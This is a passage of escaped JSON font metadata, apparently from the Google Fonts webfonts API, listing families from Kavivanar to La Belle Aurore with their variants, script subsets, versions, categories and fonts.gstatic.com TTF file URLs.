\"http://fonts.gstatic.com/s/kavivanar/v18/o-0IIpQgyXYSwhxP7_Jb4j5Ba_2c7A.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kavoon\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kavoon/v21/pxiFyp4_scRYhlU4NLr6f1pdEQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kdam Thmor Pro\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kdamthmorpro/v1/EJRPQgAzVdcI-Qdvt34jzurnGA7_j89I8ZWb.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Keania One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/keaniaone/v20/zOL54pXJk65E8pXardnuycRuv-hHkOs.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kelly Slab\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kellyslab/v15/-W_7XJX0Rz3cxUnJC5t6TkMBf50kbiM.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kenia\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kenia/v24/jizURE5PuHQH9qCONUGswfGM.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Khand\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/khand/v17/TwMN-IINQlQQ0bL5cFE3ZwaH__-C.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/khand/v17/TwMA-IINQlQQ0YpVWHU_TBqO.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/khand/v17/TwMN-IINQlQQ0bKhcVE3ZwaH__-C.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/khand/v17/TwMN-IINQlQQ0bKNdlE3ZwaH__-C.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/khand/v17/TwMN-IINQlQQ0bLpd1E3ZwaH__-C.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Khmer\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khmer\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/khmer/v25/MjQImit_vPPwpF-BpN2EeYmD.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Khula\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/khula/v12/OpNPnoEOns3V7G-ljCvUrC59XwXD.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/khula/v12/OpNCnoEOns3V7FcJpA_chzJ0.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/khula/v12/OpNPnoEOns3V7G_RiivUrC59XwXD.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/khula/v12/OpNPnoEOns3V7G-1iyvUrC59XwXD.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/khula/v12/OpNPnoEOns3V7G-piCvUrC59XwXD.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kings\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kings/v5/8AtnGsK4O5CYXU_Iq6GSPaHS.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kirang Haerang\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kiranghaerang/v20/E21-_dn_gvvIjhYON1lpIU4-bcqvWPaJq4no.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kite One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kiteone/v20/70lQu7shLnA_E02vyq1b6HnGO4uA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kiwi Maru\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/kiwimaru/v14/R70djykGkuuDep-hRg6gNCi0Vxn9R5ShnA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/kiwimaru/v14/R70YjykGkuuDep-hRg6YmACQXzLhTg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/kiwimaru/v14/R70djykGkuuDep-hRg6gbCm0Vxn9R5ShnA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Klee One\",\n      \"variants\": [\n        \"regular\",\n        \"600\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"greek-ext\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kleeone/v7/LDIxapCLNRc6A8oT4q4AOeekWPrP.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/kleeone/v7/LDI2apCLNRc6A8oT4pbYF8Osc-bGkqIw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Knewave\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/knewave/v14/sykz-yx0lLcxQaSItSq9-trEvlQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"KoHo\",\n      \"variants\": [\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/koho/v16/K2FxfZ5fmddNPuE1WJ75JoKhHys.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/koho/v16/K2FzfZ5fmddNNisssJ_zIqCkDyvqZA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/koho/v16/K2FxfZ5fmddNPoU2WJ75JoKhHys.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/koho/v16/K2FzfZ5fmddNNiss1JzzIqCkDyvqZA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/koho/v16/K2F-fZ5fmddNBikefJbSOos.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/koho/v16/K2FwfZ5fmddNNisUeLTXKou4Bg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/koho/v16/K2FxfZ5fmddNPt03WJ75JoKhHys.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/koho/v16/K2FzfZ5fmddNNissjJ3zIqCkDyvqZA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/koho/v16/K2FxfZ5fmddNPvEwWJ75JoKhHys.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/koho/v16/K2FzfZ5fmddNNissoJrzIqCkDyvqZA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/koho/v16/K2FxfZ5fmddNPpUxWJ75JoKhHys.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/koho/v16/K2FzfZ5fmddNNissxJvzIqCkDyvqZA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kodchasan\",\n      \"variants\": [\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/kodchasan/v16/1cX0aUPOAJv9sG4I-DJeR1Cggeqo3eMeoA.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/kodchasan/v16/1cXqaUPOAJv9sG4I-DJWjUlIgOCs_-YOoIgN.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/kodchasan/v16/1cX0aUPOAJv9sG4I-DJeI1Oggeqo3eMeoA.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/kodchasan/v16/1cXqaUPOAJv9sG4I-DJWjUksg-Cs_-YOoIgN.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/kodchasan/v16/1cXxaUPOAJv9sG4I-DJmj3uEicG01A.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/kodchasan/v16/1cX3aUPOAJv9sG4I-DJWjXGAq8Sk1PoH.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/kodchasan/v16/1cX0aUPOAJv9sG4I-DJee1Kggeqo3eMeoA.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/kodchasan/v16/1cXqaUPOAJv9sG4I-DJWjUl0guCs_-YOoIgN.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/kodchasan/v16/1cX0aUPOAJv9sG4I-DJeV1Wggeqo3eMeoA.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/kodchasan/v16/1cXqaUPOAJv9sG4I-DJWjUlYheCs_-YOoIgN.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/kodchasan/v16/1cX0aUPOAJv9sG4I-DJeM1Sggeqo3eMeoA.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/kodchasan/v16/1cXqaUPOAJv9sG4I-DJWjUk8hOCs_-YOoIgN.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Koh Santepheap\",\n      \"variants\": [\n        \"100\",\n        \"300\",\n        \"regular\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/kohsantepheap/v9/gNMfW3p6SJbwyGj2rBZyeOrTjNuFHVyTtjNJUWU.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/kohsantepheap/v9/gNMeW3p6SJbwyGj2rBZyeOrTjNtNP3y5mD9ASHz5.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/kohsantepheap/v9/gNMdW3p6SJbwyGj2rBZyeOrTjOPhF1ixsyNJ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/kohsantepheap/v9/gNMeW3p6SJbwyGj2rBZyeOrTjNtdOHy5mD9ASHz5.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/kohsantepheap/v9/gNMeW3p6SJbwyGj2rBZyeOrTjNtlOny5mD9ASHz5.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kolker Brush\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kolkerbrush/v3/iJWDBXWRZjfKWdvmzwvvog3-7KJ6x8qNUQ.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kosugi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kosugi/v14/pxiFyp4_v8FCjlI4NLr6f1pdEQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kosugi Maru\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kosugimaru/v14/0nksC9PgP_wGh21A2KeqGiTqivr9iBq_.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kotta One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kottaone/v20/S6u_w41LXzPc_jlfNWqPHA3s5dwt7w.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Koulen\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/koulen/v25/AMOQz46as3KIBPeWgnA9kuYMUg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kranky\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kranky/v24/hESw6XVgJzlPsFnMpheEZo_H_w.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kreon\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v32\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/kreon/v32/t5t9IRIUKY-TFF_LW5lnMR3v2DnvPNimejUfp2dWNg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/kreon/v32/t5t9IRIUKY-TFF_LW5lnMR3v2DnvYtimejUfp2dWNg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/kreon/v32/t5t9IRIUKY-TFF_LW5lnMR3v2DnvUNimejUfp2dWNg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/kreon/v32/t5t9IRIUKY-TFF_LW5lnMR3v2DnvvN-mejUfp2dWNg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/kreon/v32/t5t9IRIUKY-TFF_LW5lnMR3v2Dnvhd-mejUfp2dWNg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kristi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kristi/v17/uK_y4ricdeU6zwdRCh0TMv6EXw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Krona One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kronaone/v14/jAnEgHdjHcjgfIb1ZcUCMY-h3cWkWg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Krub\",\n      \"variants\": [\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/krub/v9/sZlEdRyC6CRYZo47KLF4R6gWaf8.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/krub/v9/sZlGdRyC6CRYbkQiwLByQ4oTef_6gQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/krub/v9/sZlEdRyC6CRYZuo4KLF4R6gWaf8.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/krub/v9/sZlGdRyC6CRYbkQipLNyQ4oTef_6gQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/krub/v9/sZlLdRyC6CRYXkYQDLlTW6E.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/krub/v9/sZlFdRyC6CRYbkQaCJtWS6EPcA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/krub/v9/sZlEdRyC6CRYZrI5KLF4R6gWaf8.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/krub/v9/sZlGdRyC6CRYbkQi_LJyQ4oTef_6gQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/krub/v9/sZlEdRyC6CRYZp4-KLF4R6gWaf8.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/krub/v9/sZlGdRyC6CRYbkQi0LVyQ4oTef_6gQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/krub/v9/sZlEdRyC6CRYZvo_KLF4R6gWaf8.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/krub/v9/sZlGdRyC6CRYbkQitLRyQ4oTef_6gQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kufam\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kufam/v20/C8c-4cY7pG7w_oSJDszBXsKCcBH3lqk7qQCJHvIwYg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/kufam/v20/C8c-4cY7pG7w_oSJDszBXsKCcBH3pKk7qQCJHvIwYg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/kufam/v20/C8c-4cY7pG7w_oSJDszBXsKCcBH3SK47qQCJHvIwYg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/kufam/v20/C8c-4cY7pG7w_oSJDszBXsKCcBH3ca47qQCJHvIwYg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/kufam/v20/C8c-4cY7pG7w_oSJDszBXsKCcBH3Fq47qQCJHvIwYg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/kufam/v20/C8c-4cY7pG7w_oSJDszBXsKCcBH3P647qQCJHvIwYg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/kufam/v20/C8c84cY7pG7w_q6APDMZN6kY3hbiXurT6gqNPPcgYp0i.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/kufam/v20/C8c84cY7pG7w_q6APDMZN6kY3hbiXurh6gqNPPcgYp0i.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/kufam/v20/C8c84cY7pG7w_q6APDMZN6kY3hbiXuoN7QqNPPcgYp0i.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/kufam/v20/C8c84cY7pG7w_q6APDMZN6kY3hbiXuo07QqNPPcgYp0i.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/kufam/v20/C8c84cY7pG7w_q6APDMZN6kY3hbiXupT7QqNPPcgYp0i.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/kufam/v20/C8c84cY7pG7w_q6APDMZN6kY3hbiXup67QqNPPcgYp0i.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kulim Park\",\n      \"variants\": [\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/kulimpark/v14/fdN49secq3hflz1Uu3IwjJYNwa5aZbUvGjU.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/kulimpark/v14/fdNm9secq3hflz1Uu3IwhFwUKa9QYZcqCjVVUA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/kulimpark/v14/fdN49secq3hflz1Uu3IwjPIOwa5aZbUvGjU.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/kulimpark/v14/fdNm9secq3hflz1Uu3IwhFwUTaxQYZcqCjVVUA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/kulimpark/v14/fdN79secq3hflz1Uu3IwtF4m5aZxebw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/kulimpark/v14/fdN59secq3hflz1Uu3IwhFws4YR0abw2Aw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/kulimpark/v14/fdN49secq3hflz1Uu3IwjIYIwa5aZbUvGjU.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/kulimpark/v14/fdNm9secq3hflz1Uu3IwhFwUOapQYZcqCjVVUA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/kulimpark/v14/fdN49secq3hflz1Uu3IwjOIJwa5aZbUvGjU.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/kulimpark/v14/fdNm9secq3hflz1Uu3IwhFwUXatQYZcqCjVVUA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kumar One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"gujarati\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kumarone/v17/bMr1mS-P958wYi6YaGeGNO6WU3oT0g.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kumar One Outline\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"gujarati\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kumaroneoutline/v17/Noao6VH62pyLP0fsrZ-v18wlUEcX9zDwRQu8EGKF.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kumbh Sans\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNorqSyNIXIwSP0XD.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNopqSiNIXIwSP0XD.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNoq0SiNIXIwSP0XD.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNorqSiNIXIwSP0XD.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNorYSiNIXIwSP0XD.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNoo0TSNIXIwSP0XD.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNooNTSNIXIwSP0XD.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNopqTSNIXIwSP0XD.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNopDTSNIXIwSP0XD.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kurale\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kurale/v11/4iCs6KV9e9dXjho6eAT3v02QFg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"La Belle Aurore\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": 